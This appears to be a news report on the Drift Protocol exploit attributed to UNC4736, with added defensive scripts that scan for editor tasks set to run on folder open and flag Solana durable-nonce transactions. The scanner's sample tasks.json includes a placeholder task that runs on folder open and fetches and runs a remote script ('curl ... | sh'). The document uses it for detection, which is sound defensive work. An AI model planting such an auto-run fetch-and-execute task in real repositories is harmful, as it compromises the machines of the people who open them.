Drift Crypto Protocol has attributed its $270 million exploit on April 1, 2026, to a six-month operation conducted by UNC4736, a North Korean state-affiliated threat group also known as Citrine Sleet or AppleJeus.
The incident represents the largest recorded exploit of a native Solana decentralized application and reflects a prolonged infiltration strategy rather than a rapid, opportunistic breach.
Attackers reportedly posed as a quantitative trading firm and initiated contact during a major cryptocurrency conference in fall 2025.
They later deposited more than $1 million into an Ecosystem Vault and maintained routine engagement with contributors while building credibility within the protocol’s network.
Drift stated that the individuals who appeared at conferences across multiple countries were likely intermediaries using constructed professional identities consistent with previously documented DPRK-linked operations.
According to the protocol’s disclosure, the group established communication channels through Telegram and engaged in discussions surrounding vault integrations and trading strategies.
Between December 2025 and January 2026, they completed onboarding processes typical for decentralized finance participants and operated within the ecosystem without triggering security alarms.
The intrusion involved two primary technical vectors identified during the investigation.
One was a TestFlight application presented as a proprietary wallet, enabling distribution outside Apple’s standard App Store review process.
The second leveraged a weakness in widely used code editors, including Cursor, in which merely opening a file or folder could cause arbitrary code to execute on the contributor's machine; the disclosure does not name the specific editor feature that was abused.
Security researchers had publicly flagged this exploitation method months before the incident.
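The disclosure above does not say which editor feature delivered the code execution. One documented folder-open auto-execution path in VS Code-derived editors (Cursor is one) is a task in `.vscode/tasks.json` whose `runOptions.runOn` is set to `folderOpen`; upstream VS Code gates such tasks behind Workspace Trust, and whether a given fork enables that gate by default must be verified for the editor in use. The following scanner is an added example, not code from the original page, from Drift, or from any of the investigators it cites, and it makes no claim that this particular mechanism was the one used. The sample `tasks.json` it inspects is constructed, and the `curl ... | sh` command in it is a placeholder standing in for any payload. The point is to let a contributor inspect a received repository from the command line before an editor ever opens it.

```python
import json
import os
import re

# Constructed sample of a .vscode/tasks.json with one ordinary build task and one task
# that launches a shell command as soon as the folder is opened (placeholder payload).
SAMPLE_TASKS_JSON = r'''{
  // comments are permitted in tasks.json, so strip them before parsing
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "make",
      "group": "build"
    },
    {
      "label": "sync deps",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

# Only strip comments that start a line, so "https://..." inside strings is untouched.
_LINE_COMMENT = re.compile(r"^\s*//.*$", re.MULTILINE)


def load_tasks(text: str) -> dict:
    """Parse tasks.json, tolerating the // line comments the format allows."""
    return json.loads(_LINE_COMMENT.sub("", text))


def auto_run_tasks(doc: dict) -> list:
    """Return the tasks configured to run automatically on folder open."""
    hits = []
    for task in doc.get("tasks", []):
        run_options = task.get("runOptions") or {}
        if run_options.get("runOn") == "folderOpen":
            hits.append({
                "label": task.get("label"),
                "type": task.get("type"),
                "command": task.get("command"),
                "args": task.get("args", []),
            })
    return hits


def scan_workspace(root: str) -> list:
    """Inspect <root>/.vscode/tasks.json on disk without opening the folder in an editor."""
    path = os.path.join(root, ".vscode", "tasks.json")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8") as fh:
        return auto_run_tasks(load_tasks(fh.read()))


if __name__ == "__main__":
    # Run against the constructed sample; pass a checkout path to scan_workspace() for real use.
    for hit in auto_run_tasks(load_tasks(SAMPLE_TASKS_JSON)):
        print("AUTO-RUN TASK ON FOLDER OPEN:", hit)
```

A hit is not proof of malice (some projects legitimately start a watcher on open), but any auto-run task in a repository received from an unverified counterparty should be read before the folder is opened, and the editor's workspace-trust setting confirmed to be on.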
After compromising contributor devices, the attackers obtained the two multisig approvals needed to pre-sign transactions using Solana's durable nonce feature. An ordinary Solana transaction references a recent blockhash and expires once that blockhash ages out of the recent set (roughly 150 slots, about a minute), so a signature captured from a contributor would normally be worthless within moments; a durable-nonce transaction instead references the value stored in a nonce account and stays valid, signatures intact, until that nonce is advanced.
The pre-signed transactions sat dormant for more than a week before being submitted on April 1, draining $270 million in under one minute.
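The practical check that follows from the durable-nonce detail above is to treat any approved or pending multisig transaction whose first instruction is `SystemProgram::AdvanceNonceAccount` as a standing authorization rather than a one-off, and to hunt for such transactions in history. The script below is an added example, not code from the original page, from Drift, or from the investigators it cites; it takes transactions in the shape returned by Solana's `getTransaction` RPC (both the `jsonParsed` and the raw `json` encodings) and reports which ones use a durable nonce. Durable-nonce transactions must place `AdvanceNonceAccount` first, the System Program's instruction index for it is 4 (encoded as a little-endian u32), and the nonce account is that instruction's first account. The three sample transactions, their signatures, and account pubkeys are constructed for illustration.

```python
# Added example: flag Solana transactions that rely on a durable nonce.
_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
SYSTEM_PROGRAM = "11111111111111111111111111111111"
ADVANCE_NONCE_ACCOUNT = 4   # SystemInstruction enum index, serialized as little-endian u32


def b58decode(s: str) -> bytes:
    """Minimal base58 decoder for instruction data in the raw json encoding."""
    n = 0
    for ch in s:
        n = n * 58 + _B58.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(s) - len(s.lstrip("1"))       # each leading '1' is a zero byte
    return b"\x00" * leading + body


def _pubkey(entry):
    # jsonParsed lists account keys as {"pubkey": ...}; raw json lists bare strings
    return entry["pubkey"] if isinstance(entry, dict) else entry


def durable_nonce_account(tx: dict):
    """Return the nonce account if the first instruction is AdvanceNonceAccount, else None."""
    msg = tx["transaction"]["message"]
    instrs = msg.get("instructions") or []
    if not instrs:
        return None
    first = instrs[0]
    if "parsed" in first:                        # jsonParsed, decoded by the RPC node
        parsed = first["parsed"]
        if first.get("program") == "system" and isinstance(parsed, dict) \
                and parsed.get("type") == "advanceNonce":
            return parsed["info"]["nonceAccount"]
        return None
    keys = [_pubkey(k) for k in msg.get("accountKeys", [])]
    if "programIdIndex" in first:                # raw json: indices into accountKeys
        program = keys[first["programIdIndex"]]
        accounts = [keys[i] for i in first["accounts"]]
    else:                                        # jsonParsed fallback for undecoded instructions
        program = first.get("programId")
        accounts = first.get("accounts", [])
    if program != SYSTEM_PROGRAM:
        return None
    data = b58decode(first["data"])
    if len(data) >= 4 and int.from_bytes(data[:4], "little") == ADVANCE_NONCE_ACCOUNT:
        return accounts[0]                       # account 0 of AdvanceNonceAccount is the nonce
    return None


def triage(txs) -> dict:
    """Map signature -> nonce account for every durable-nonce transaction in txs."""
    out = {}
    for tx in txs:
        nonce = durable_nonce_account(tx)
        if nonce:
            out[tx["transaction"]["signatures"][0]] = nonce
    return out


# Constructed samples: a plain transfer, a jsonParsed durable-nonce tx, and the same
# AdvanceNonceAccount instruction in raw json form ("6vx8P" is base58 of 04 00 00 00).
SAMPLE_TXS = [
    {"transaction": {"signatures": ["sigPlainTransfer"], "message": {
        "accountKeys": [{"pubkey": "PayerExample"}, {"pubkey": "DestExample"},
                        {"pubkey": SYSTEM_PROGRAM}],
        "instructions": [{"program": "system", "programId": SYSTEM_PROGRAM,
                          "parsed": {"type": "transfer", "info": {
                              "source": "PayerExample", "destination": "DestExample",
                              "lamports": 1000}}}]}}},
    {"transaction": {"signatures": ["sigNonceParsed"], "message": {
        "accountKeys": [{"pubkey": "AuthorityExample"}, {"pubkey": "NonceExample"},
                        {"pubkey": SYSTEM_PROGRAM}],
        "instructions": [{"program": "system", "programId": SYSTEM_PROGRAM,
                          "parsed": {"type": "advanceNonce", "info": {
                              "nonceAccount": "NonceExample",
                              "nonceAuthority": "AuthorityExample"}}},
                         {"programId": "TokenProgramExample", "accounts": [], "data": ""}]}}},
    {"transaction": {"signatures": ["sigNonceRaw"], "message": {
        "accountKeys": ["AuthorityExample", "NonceExample",
                        "SysvarRecentB1ockHashes11111111111111111111", SYSTEM_PROGRAM],
        "instructions": [{"programIdIndex": 3, "accounts": [1, 2, 0], "data": "6vx8P"}]}}},
]

if __name__ == "__main__":
    for sig, nonce in triage(SAMPLE_TXS).items():
        print(f"{sig}: durable nonce via {nonce}; signatures stay valid until nonce advances")
```

For a live review, feed `triage()` the output of `getSignaturesForAddress` followed by `getTransaction` for the multisig's vault, and pair it with `getAccountInfo` on each flagged nonce account: if the stored nonce still matches the dormant transaction's blockhash field, that authorization is still live and the only remediation is to advance or withdraw the nonce and rotate the compromised signer keys.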
Drift reported that 41.72 million JLP tokens were swapped across decentralized exchanges before being bridged to Ethereum.
On-chain analysis linked fund flows to wallets associated with the October 2024 Radiant Capital exploit.
Attribution to UNC4736 was supported by blockchain analytics and forensic findings from Mandiant and SEAL 911, which assessed the connection with medium-high confidence.
The group is believed to operate under North Korea’s Reconnaissance General Bureau and has been connected to prior malware campaigns under the AppleJeus designation.
Drift indicated that further details may emerge in upcoming forensic reporting as investigators continue analyzing infrastructure overlaps and fund movements.